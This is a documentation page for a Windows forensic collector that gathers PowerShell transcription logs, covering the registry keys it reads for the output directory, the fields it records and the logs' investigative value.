Powershell Logs
Overview
Section titled “Overview”Evidence: Powershell Logs
Description: Collect Powershell Logs
Category: System
Platform: windows
Short Name: pwrs
Is Parsed: No
Sent to Investigation Hub: Yes
Collect File(s): Yes
Background
Section titled “Background”PowerShell transcription creates detailed logs of PowerShell sessions including all commands executed and their output. Transcription must be enabled via Group Policy or registry settings.
When enabled, transcripts are saved as text files and contain complete records of PowerShell activity, making them extremely valuable for detecting malicious PowerShell usage.
Data Collected
Section titled “Data Collected”This collector gathers structured data about powershell logs.
Powershell Logs Data
Section titled “Powershell Logs Data”| Field | Description | Example |
|---|---|---|
Name | Artifact name | Powershell Log |
Type | File or Folder | Folder |
SourcePath | Original path | C:\Transcripts\PowerShell_transcript.DESKTOP.abc123.20231015143000.txt |
Path | Relative path in evidence | Other/PowerShell_transcript… |
Collection Method
Section titled “Collection Method”This collector:
- Reads the transcript output directory from registry:
HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription- OutputDirectory valueHKCU\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription- OutputDirectory value
- Collects all files from the configured transcript directories
Forensic Value
Section titled “Forensic Value”PowerShell transcripts provide complete visibility into PowerShell command execution. Investigators use this data to identify malicious PowerShell commands, track attacker reconnaissance activities, detect PowerShell-based lateral movement, analyze encoded or obfuscated commands, and establish complete PowerShell activity timelines.